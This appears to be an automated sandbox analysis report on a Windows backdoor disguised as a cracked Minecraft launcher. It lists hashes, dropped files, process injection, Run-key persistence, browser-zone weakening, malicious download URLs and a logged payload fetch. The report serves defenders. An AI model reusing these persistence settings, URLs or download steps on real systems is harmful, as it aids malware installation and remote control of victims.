Backdoor.Win32.Farfli_7061c534ce

by malwarelabrobot on June 16th, 2014 in Malware Descriptions.

Trojan.Win32.Inject.mwhq (Kaspersky), Trojan.GenericKD.1665749 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 7061c534cea9592508ea2e112d07029c
SHA1: a790bf538dee4543a267876ba10412a8eed9b974
SHA256: 710fc5cfca48bcca67fc437cdcce79f40f7d6664870f0ccc88a5616ca2ec0a61
SSDeep: 24576:U qxd7MUGBUrI88kLKpa8DEnQPNoypNR1o7bw/qaeDQD2hUF6zjyyjaWsiMC/pV:V1xmi8hBYQPNXhswA FKEisFR63
Size: 1933824 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: AirInstaller
Created at: 2014-03-23 13:16:02
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

879.exe:2224
879.exe:2196
%original file name%.exe:288
%original file name%.exe:1872
104.exe:1524
104.exe:684
104.exe:1956
104.exe:556
InstallDir.exe:2204
InstallDir.exe:2160

The Backdoor injects its code into the following process(es):

javaw.exe:680
svchost.exe:1592
iexplore.exe:3128

File activity

The process 879.exe:2224 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)

The Backdoor deletes the following file(s):

%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (0 bytes)

The process 879.exe:2196 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

The Backdoor deletes the following file(s):

The process %original file name%.exe:288 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)

The process %original file name%.exe:1872 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)

The process 104.exe:1524 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

The process 104.exe:684 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (239350 bytes)

The Backdoor deletes the following file(s):

%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (0 bytes)

The process 104.exe:1956 makes changes in the file system.
The Backdoor deletes the following file(s):

The process 104.exe:556 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (22474 bytes)

The Backdoor deletes the following file(s):

%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (0 bytes)

The process InstallDir.exe:2204 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (0 bytes)

The process InstallDir.exe:2160 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes)

Registry activity

The process 879.exe:2224 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 6A 9D 0F 52 26 BE E6 F1 61 89 1D AB D7 06 4E"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "879.exe"

The process %original file name%.exe:288 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 AC 78 2E EE 9B 5F 39 3B DD 60 B6 D9 64 A8 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"104.exe" = "1.7.4 Cracked Minecraft Launcher"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4802"
"wshext.dll,-4803"
"cryptext.dll,-6112"
"cryptext.dll,-6113"
"cryptext.dll,-6110"
"cdfview.dll,-4610"
"accwiz.exe,-16"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9918"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4801"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9927"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9912"
"unregmp2.exe,-9913"
"unregmp2.exe,-9910"
"unregmp2.exe,-9911"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\PCHealth\HelpCtr\Binaries]
"msinfo.dll,-391"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Movie Maker]
"wmm2res.dll,-63097"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9915"
"unregmp2.exe,-9916"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"RCBdyctl.dll,-150"
"msi.dll,-34"
"msi.dll,-35"
"cryptext.dll,-6111"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12346"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"notepad.exe,-469"
"shscrap.dll,-258"
"wshext.dll,-4805"
"msxml3r.dll,-1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-190"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"scrobj.dll,-8192"
"msxml3r.dll,-2"
"shimgvw.dll,-301"
"PresentationHost.exe,-3306"
"shimgvw.dll,-303"
"shimgvw.dll,-302"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-209"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-304"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Internet Explorer\Connection Wizard]
"icwres.dll,-20003"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-306"
"shimgvw.dll,-305"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9902"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"zipfldr.dll,-10195"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-208"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6109"
"cryptext.dll,-6108"
"wshext.dll,-4800"
"shimgvw.dll,-307"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12345"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"netshell.dll,-1300"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12347"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Procmon.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-22978"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9923"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"nmwb.dll,-1234"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9920"
"unregmp2.exe,-9909"
"unregmp2.exe,-9926"
"unregmp2.exe,-9925"
"unregmp2.exe,-9905"
"unregmp2.exe,-9904"
"unregmp2.exe,-9907"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3308"
"mmcbase.dll,-130"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9903"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"pdh.dll,-10023"
"icardres.dll.mui,-4162"
"SHELL32.dll,-8964"
"icardres.dll.mui,-4146"
"SHELL32.dll,-9227"
"setupapi.dll,-2000"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"cmd.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"sandbox_svc.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-881"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6145"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9914"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3300"
"wshext.dll,-4804"
"ntbackup.exe,-40"
"SHELL32.dll,-9217"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9908"

The process %original file name%.exe:1872 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 27 22 12 24 E0 95 6E 4B 24 E2 13 92 FC 27 0A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir]
"InstallDir.exe" = "VNC® Chat"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
"ServerStarted" = "6/15/2014 9:12:20 AM"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

The process 104.exe:684 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 96 42 BB A2 BD 7C 7F EF EE E7 50 D2 E3 1B 49"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"

The process 104.exe:556 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC CF CF 2B FB C3 42 6C 85 0D 30 EF 9F 34 47 67"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"

The process InstallDir.exe:2204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\YwRtlw]
"ServerStarted" = "6/15/2014 9:13:00 AM"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\2204]
"Mutex" = "YwRtlw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 89 4A E1 20 3E 72 01 F0 05 4F 20 C2 2C C0 D7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

The process InstallDir.exe:2160 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 41 9E F3 C3 CB 81 70 D3 D5 3C 55 C4 C4 80 F9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"879.exe" = "1.7.4 Cracked Minecraft Launcher"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
49a4c5726b27df7d7fe01b938f3e68f8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\104.exe
5474216f6a34fd7a15b65a9c049f6287 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\879.exe
b427962bdb196d132af50f6c7b78380d c:\Program Files\Java\jre6\launch4j-tmp\879.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: RealVNC Ltd
Product Name: HD Player
Product Version: 5.0.6 (r113416)
Legal Copyright: Copyright (c) 2002-2013 RealVNC Ltd.
Legal Trademarks: VNC is a registered trademark of RealVNC Ltd. in the U.S. and in other countries.
Original Filename: vncchat.exe
Internal Name: vncchat
File Version: 5.0.6 (r113416)
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 1663108 1663488 5.5427 19b64f2a3605f24c0adcfb9f0b9fa548
.rsrc 1679360 268930 269312 4.45655 0298a39ab4fadfd1ee49aec74cb73937
.reloc 1949696 12 512 0.067931 0a5bd6c7acedbd1af33ea553c85bf0da

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://titanindex.net/LauncherUpdate/Minecraft Launcher.exe
hxxp://stats.teamextrememc.com/countgif.php 162.159.247.124
hxxp://www.titanindex.net/LauncherUpdate/Minecraft Launcher.exe 96.47.231.234
s3.amazonaws.com 54.240.235.3
dl.dropboxusercontent.com 50.16.206.191
dl.dropbox.com 54.243.91.124


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY DropBox User Content Access over SSL
ET POLICY Vulnerable Java Version 1.6.x Detected
ET TROJAN Java EXE Download by Vulnerable Version - Likely Driveby
ET POLICY Java EXE Download

Traffic

GET /LauncherUpdate/Minecraft Launcher.exe HTTP/1.1
User-Agent: Java/1.6.0_18
Host: VVV.titanindex.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Date: Sun, 15 Jun 2014 11:06:14 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Sun, 08 Jun 2014 17:37:33 GMT
ETag: "66a069b-17c244-4fb568cb44360"
Accept-Ranges: bytes
Content-Length: 1557060
Connection: close
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...>
..S.................H...H...............`....@........................
..`............@... ...................................... ..T2.......
......................................................................
..............................text...(G.......H.................. .0`.
data........`[email protected].........
[email protected]@.bss..................................0..idata...............
[email protected]... ...4...`[email protected]............
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......]..U.1..u...1...
=....wC=....r[.......$....1..T$..TD.....tz..t...$..............u..]...
]...=....t.wJ=....t....u..]...]....=....t[=....u...$....1..t$...C.....
tj..t...$........=........$..........L$...C......v....3A...l.....$....
1..L$...C.....t0....R.....$.......?.....$..........D$..lC...%.....$...
.......\$..RC...............'....U..S..$.]...$..@.."[email protected].....
[email protected]..\$....`@[email protected]..`@.....A.........
...t ...A..D$.....A..K0..$..B......A....t.....A..\$.....A..QP..$..
<<< skipped >>>


GET /countgif.php HTTP/1.1
User-Agent: Java/1.6.0_18
Host: stats.teamextrememc.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sun, 15 Jun 2014 11:06:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d12838b93bfa00f1babb6383ccc8533421402830383000; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.teamextrememc.com; HttpOnly
Cache-Control: max-age=10
Expires: Sun, 15 Jun 2014 11:06:33 GMT
CF-RAY: 13ae4c45c81a020d-IAD
dc9..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | stats.teamextrememc.com used CloudFlare t
o restrict access</title>.<meta charset="UTF-8" />.<met
a http-equiv="Content-Type" content="text/html; charset=UTF-8" />.&
lt;meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.
<meta name="robots" content="noindex, nofollow" />.<meta name
="viewport" content="width=device-width,initial-scale=1,maximum-scale=
1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/s
tyles/cf.errors.css" type="text/css" media="screen,projection" />.&
lt;!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' 
href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,
projection" /><![endif]-->.<style type="text/css">body{
margin:0;padding:0}</style>.<!--[if lt IE 9]><script ty
pe="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.9.
1/jquery.min.js"></script><![endif]-->.<!--[if gte I
E 9]><!--><script type="text/javascript" src="//cdnjs.clou
dflare.com/ajax/libs/zepto/1.0/zepto.min.js"></script><
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

javaw.exe_680:

.text
`.rdata
@.data
.rsrc
/Xusage.txt
-Djava.class.path=%s
Unable to locate JRE meeting specification "%s"
1.6.0_18-b07
JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s
Syntax error in version specification "%s"
Invalid or corrupt jarfile %s
Unable to access jarfile %s
-Djava.awt.headless=
-Djava.awt.headless=true
option[-] = '%s'
ignoreUnrecognized is %s,
sun.jnu.encoding
isSupported
-Dsun.java.command=
-Dsun.java.launcher=SUN_STANDARD
A %c separated list of directories, JAR archives,
load Java programming language agent, see java.lang.instrument
The default VM is %s%s
is a synonym for the "%s" VM [deprecated]
to select the "%s" VM
Usage: %s [-options] class [args...]
(to execute a class)
or %s [-options] -jar jarfile [args...]
(to execute a jar file)
